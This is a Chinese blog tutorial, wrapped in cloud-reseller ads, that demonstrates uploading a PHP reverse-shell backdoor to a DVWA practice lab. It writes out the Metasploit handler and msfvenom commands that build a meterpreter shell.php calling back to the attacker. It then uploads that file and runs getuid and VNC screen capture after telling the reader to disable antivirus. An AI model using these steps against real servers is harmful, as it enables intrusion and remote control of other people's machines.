PHP后门反弹演示

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

准备

  1. 一台kali虚拟机
  2. 一台 win11物理机
  1. phpstudy 开启 Nginx和Mysql
  2. phpstudy中已经搭建好DVWA靶场
  3. DVWA靶场的安全等级调整值low

注意:

需要将杀毒软件个关了, 否则有提示, 黑客入侵.

开始

使用监控模块, 输入:

use exploit/multi/handler

配置payload

set payload php/meterpreter/reverse_tcp

# 接着输入
options

PHP后门反弹演示_php

设置 lhost 和lport

这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了

set lhost 攻击机的ip

PHP后门反弹演示_上传_02

生成php后门执行攻击获得meterpreter

注意:  要新建端口, 在root权限下执行

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip  lport=4444 R>shell.php

PHP后门反弹演示_上传_03

PHP后门反弹演示_上传_04

这样在window11左面少就有这个文件了

上传文件

这是我原来的地址: http://dvwa/vulnerabilities/upload/#

这是我要填写的地址: http://dvwa/hackable/uploads/shell.php

出现上图几面说明:   这是正常的, 后门已经上传到了靶机上

获得权限

  1. 输入:

run 

# 也可以直接输入 exploit  , 都一样

PHP后门反弹演示_php_05

也可能出现 404, 都是正常现象

只要有这两行, 就代表上传的后门生效了

PHP后门反弹演示_php_06

成功啦

  1. 获取管理员的名字, 输入:

getuid

  1. 观看屏幕 可以在meterpreter里输入

run vnc

点开文件即可看到自己电脑的画面

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6
标签: php
返回列表

上一篇:Crack:结构分析和设计软件:Cross Section Analysis-Design

下一篇:oracle rowid字段解析

“PHP后门反弹演示” 的相关文章

前后端分离项目,vue+uni-app+php+mysql订座预约系统设计与实现(H5移动项目)_php 注册接口1年前 (2023-02-02)
分享97个PHP源码,总有一款适合您1年前 (2023-02-02)
PHP 实例 - AJAX 与 XML1年前 (2023-02-02)
php报错SERVER SENT CHARSET (255) UNKNOWN1年前 (2023-02-03)
PHP介绍和几个概念(0)1年前 (2023-02-04)
【PHP 随记】—— laravel 目录结构分析1年前 (2023-02-05)
PHP 5 SimpleXML 函数1年前 (2023-02-07)
PHP XML Parser 函数1年前 (2023-02-08)
php mysql美食网站Dreamweaver1年前 (2023-02-09)
为Nginx和Apache配置多版本PHP、切割多个conf文件1年前 (2023-02-16)

阿里云国际版